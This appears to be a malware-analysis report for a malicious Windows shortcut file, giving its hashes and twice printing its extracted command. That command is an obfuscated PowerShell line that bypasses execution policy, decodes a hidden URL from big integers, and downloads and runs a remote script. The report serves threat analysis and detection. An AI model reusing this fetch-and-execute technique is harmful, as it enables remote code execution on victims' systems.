Malicious
Malicious

22083435c8b11e5c35845dcd4e88e744

LNK File
|
MD5: 22083435c8b11e5c35845dcd4e88e744
|
Size: 1.89 KB
|
application/x-ms-shortcut

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
22083435c8b11e5c35845dcd4e88e744
Sha1
81c9b94b772e98d03862b077209f0fa3a4f30559
Sha256
911d74d73741f55d8b7fadc1b429d3e02625217931b428cebb6516acd9f4787c
Sha384
6df07b6b3ed4719351037ba2365ad0cbc1fc98c51f07e926c2a277b4e13520c4a2d36cd6de916d027686fb7d577d9937
Sha512
d864426956a23fd66fdd6866aca1839f9af1ffc0cf028a3c811f80006eaf5582ba836c6476abb4dba87ae2326b31ec40caa3c582d901df37d4bd2b35c4928488
SSDeep
24:8/9SdmGjMDvSwjKUaWU3AcPWkp+/CWyp0zkwDPWXfITGC4wZVr4I0WK6c/6Cab7k:8lomeKpUQKKznP7t4wbUIA6q6Cax
TLSH
274100100BA20239DAF78B35ECFA6213B5217906EA215F4F12D5435848B4111E966F3F
File Structure
22083435c8b11e5c35845dcd4e88e744
Malicious
LNK CommandLine
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -ep bypass -c "$q=[bigint]\"826562940700966331525735653278350667138702576593\";$y=[bigint]\"190580670986420006407958954826012329000314514014\";$m=$q - $y;while($m -ne 0){$l+=[char]([int]($m -band 255));$m=$m -shr 8};iwr $l -OutFile $env:TEMP\xHlKd.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\xHlKd.ps1"
22083435c8b11e5c35845dcd4e88e744 (1.89 KB)
File Structure
22083435c8b11e5c35845dcd4e88e744
Malicious
LNK CommandLine
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -ep bypass -c "$q=[bigint]\"826562940700966331525735653278350667138702576593\";$y=[bigint]\"190580670986420006407958954826012329000314514014\";$m=$q - $y;while($m -ne 0){$l+=[char]([int]($m -band 255));$m=$m -shr 8};iwr $l -OutFile $env:TEMP\xHlKd.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\xHlKd.ps1"

Malicious

22083435c8b11e5c35845dcd4e88e744
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙